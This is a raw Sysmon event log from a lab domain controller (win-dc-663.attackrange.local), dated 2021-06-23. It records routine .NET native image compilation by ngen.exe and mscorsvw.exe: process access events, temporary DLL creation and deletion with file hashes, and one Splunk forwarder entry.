21:02:09.508{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E202-00000000CF01}3740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.461{4DB9351A-A151-60D3-E102-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G3V43CF0NX\UIAutomationTypes.ni.dll.auxMD5=CCC017EEF8664392419F354669DB9F67,SHA256=004AE4A1A6C92F266610DF7F476901AD45238490F15E0EF8AB7A72891AB0CA1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.445{4DB9351A-A151-60D3-E102-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G3V43CF0NX\UIAutomationTypes.ni.dllMD5=0D8547DDA6B9A187656DCE8F3AADC1D8,SHA256=88D84B9CC8243B46B2092A1FE4D34FBEFA8158B91246EDFCC12034FAFE95669E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:09.429{4DB9351A-A151-60D3-E102-00000000CF01}6856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1ac8-0\UIAutomationTypes.dll2021-06-23 21:02:09.429 10341000x800000000000000019501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.164{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E102-00000000CF01}6856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.148{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E102-00000000CF01}6856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.148{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E102-00000000CF01}6856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.117{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.101{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.101{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.023{4DB9351A-A150-60D3-DF02-00000000CF01}4832NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8V8F9RM0Z\UIAutomationProvider.ni.dll.auxMD5=9DA4CCB364E51A8E33B5D3B79C9520B4,SHA256=41F68A796D32B90974A78C449660C6EAFE56A4E3DA61FBD939917B5159C2CADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.023{4DB9351A-A150-60D3-DF02-00000000CF01}4832NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8V8F9RM0Z\UIAutomationProvider.ni.dllMD5=94757D3805032FF0720BB522BF7ED731,SHA256=5B384EBFD968FCF5E10F2726296D3A555429C91E481A87553462167510492734,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:09.008{4DB9351A-A150-60D3-DF02-00000000CF01}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e0-0\UIAutomationProvider.dll2021-06-23 21:02:09.008 10341000x800000000000000019540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.950{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.919{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.919{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.794{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.763{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-A152-60D3-E802-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IQQNJZTO5\XamlBuildTask.ni.dll.auxMD5=E54ED8F0B4B0EC6835D8EACD4942D994,SHA256=052969D57B72B8F06836E7363BFE26F53A4851B0F8337A0F1B2B9E0863A8B276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ADF12276DECD99CD0E321A5A02EF089,SHA256=EFDDD3FDFF9B0C5C893031C237435C23052DF65646EAEFB626F328F2F56F0030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-A152-60D3-E802-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IQQNJZTO5\XamlBuildTask.ni.dllMD5=27CB5817FF16B670DEB6F7376D47798C,SHA256=88A18B2C41E9B0F7E4F31A638F27A694974E652AE06392C76DFE29F0CB56C23F,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:10.685{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\cb8-0\XamlBuildTask.dll2021-06-23 21:02:10.685 10341000x800000000000000019530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.263{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.247{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.247{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.153{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.153{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.106{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 